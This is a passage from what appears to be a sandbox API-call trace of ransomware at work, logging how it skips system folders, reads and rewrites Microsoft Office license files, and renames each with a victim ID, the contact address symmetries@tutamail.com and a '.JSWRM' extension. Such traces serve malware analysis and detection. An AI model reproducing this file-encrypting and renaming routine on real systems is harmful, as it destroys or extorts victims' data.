(lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="windows") returned -1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.181] lstrcmpiW (lpString1="MondoR_SubTest2-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0104.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0104.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241308, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0104.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0104.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.181] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0104.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.182] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26525) returned 1 [0104.182] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6790) returned 0x24c1d0 [0104.182] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6790, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x6790, lpOverlapped=0x0) returned 1 [0104.194] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.194] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6790, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x6790, lpOverlapped=0x0) returned 1 [0104.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.195] CloseHandle (hObject=0x45c) returned 1 [0104.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0104.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0104.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0104.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0104.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0104.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0104.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.195] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0104.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0104.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0104.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0104.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0104.196] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4f82560, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4f82560, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe50b37dd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTest2-ul-oob.xrm-ms", cAlternateFileName="MO9617~1.XRM")) returned 1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.196] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.197] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.197] lstrcmpiW (lpString1="MondoR_SubTest2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0104.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0104.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest2-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411f0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0104.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0104.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.197] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0104.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.197] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11595) returned 1 [0104.197] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0104.198] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0104.201] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.201] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0104.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.201] CloseHandle (hObject=0x45c) returned 1 [0104.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0104.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0104.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0104.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0104.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0104.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0104.201] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.201] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0104.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0104.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0104.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0104.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0104.202] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ec3936, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ec3936, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4fce9ec, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTrial-pl.xrm-ms", cAlternateFileName="MODE19~1.XRM")) returned 1 [0104.202] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2=".") returned 1 [0104.202] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="..") returned 1 [0104.202] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="...") returned 1 [0104.202] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="windows") returned -1 [0104.203] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="recovery") returned -1 [0104.203] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.203] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.203] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.203] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.203] lstrcmpiW (lpString1="MondoR_SubTrial-pl.xrm-ms", lpString2="msocache") returned -1 [0104.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0104.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240fe8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0104.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0104.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0104.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTrial-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241010, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTrial-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0104.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0104.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0104.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0104.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.204] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11151) returned 1 [0104.204] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0104.204] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0104.208] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.208] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0104.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.208] CloseHandle (hObject=0x45c) returned 1 [0104.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0104.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0104.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0104.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.209] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0104.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0104.210] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ec3936, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ec3936, 